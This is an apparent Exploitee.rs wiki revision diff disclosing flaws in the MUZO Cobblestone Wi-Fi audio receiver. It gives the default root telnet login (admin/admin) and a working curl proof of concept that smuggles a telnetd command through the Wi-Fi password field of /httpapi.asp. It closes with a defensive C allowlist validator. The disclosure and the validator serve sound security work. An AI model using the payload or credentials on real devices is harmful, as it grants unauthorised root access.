Difference between revisions of "MUZO Cobblestone"

From Exploitee.rs
Line 16: Line 16:
The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>
The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>


==Pre Auth Root Command Injection==
==Pre Authorization Root Command Injection==


Target: /httpapi.asp
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.


Proof of Concept:
<pre style="white-space: pre-wrap;">
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>
</pre>
Connect to the telnet service as root
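Review bot: The affected endpoint is no longer named in the section's prose. The "Target: /httpapi.asp" line in this hunk has no counterpart in the latest revision, so /httpapi.asp and the pwd field of wlanConnectApEx are visible only inside the curl command. Suggest keeping the target line, or naming the endpoint and parameter in the description, so a reader can tell what to filter or patch without parsing the proof of concept. The heading and description also say "Pre Authorization" for a bug reached with "no credentials needed", which is normally called pre-authentication.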

Latest revision as of 01:04, 11 August 2017

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."

MUZO Cobblestone

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.

Purchase the MUZO Cobblestone at Amazon

Telnet Default Credentials

The device permits logins with root permissions using the username admin and the password admin.

Pre Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application because the WiFi password is passed directly to a command-line utility. A simple command injection via a curl request can spawn a telnet shell as the root user, with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
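
The missing input check, sketched as an added example (not code from the MUZO firmware or from Exploitee.rs): an allowlist validator for the `wlanConnectApEx` command string that rejects the request above before any field reaches a command line. The function names, the key list, the 128-byte limit and the assumption that legitimate values are purely alphanumeric (as in the request shown) are hypothetical.

```c
#include <ctype.h>
#include <string.h>

/* Hypothetical allowlist check (added example, not MUZO firmware code).
 * Assumes the body is "wlanConnectApEx:key=value:key=value..." and that
 * legitimate values are alphanumeric, as in the request on this page. */
static int value_is_clean(const char *v, size_t len)
{
    if (len == 0 || len > 128)          /* constructed length limit */
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)v[i]))
            return 0;                   /* rejects ; | & $ ` spaces, etc. */
    return 1;
}

/* Returns 1 if every field passes the allowlist, 0 if the request
 * must be rejected before any value reaches a command line. */
int wlan_command_is_safe(const char *cmd)
{
    static const char name[] = "wlanConnectApEx";
    static const char *const known[] =
        { "ssid", "ch", "auth", "encry", "pwd", "chext" };
    const size_t nlen = sizeof(name) - 1;
    int fields = 0;

    if (strncmp(cmd, name, nlen) != 0 || cmd[nlen] != ':')
        return 0;
    for (const char *p = cmd + nlen + 1; *p; fields++) {
        size_t flen = strcspn(p, ":");          /* one key=value field */
        const char *eq = memchr(p, '=', flen);
        if (eq == NULL)
            return 0;
        size_t klen = (size_t)(eq - p);
        int key_ok = 0;
        for (size_t i = 0; i < sizeof(known) / sizeof(known[0]); i++)
            if (strlen(known[i]) == klen && memcmp(p, known[i], klen) == 0)
                key_ok = 1;
        if (!key_ok || !value_is_clean(eq + 1, flen - klen - 1))
            return 0;
        p += flen;
        if (*p == ':' && *++p == '\0')
            return 0;                           /* trailing separator */
    }
    return fields > 0;
}
```

Validation of this kind complements, rather than replaces, invoking the utility with an argument vector (for example `execv`) instead of a shell command string.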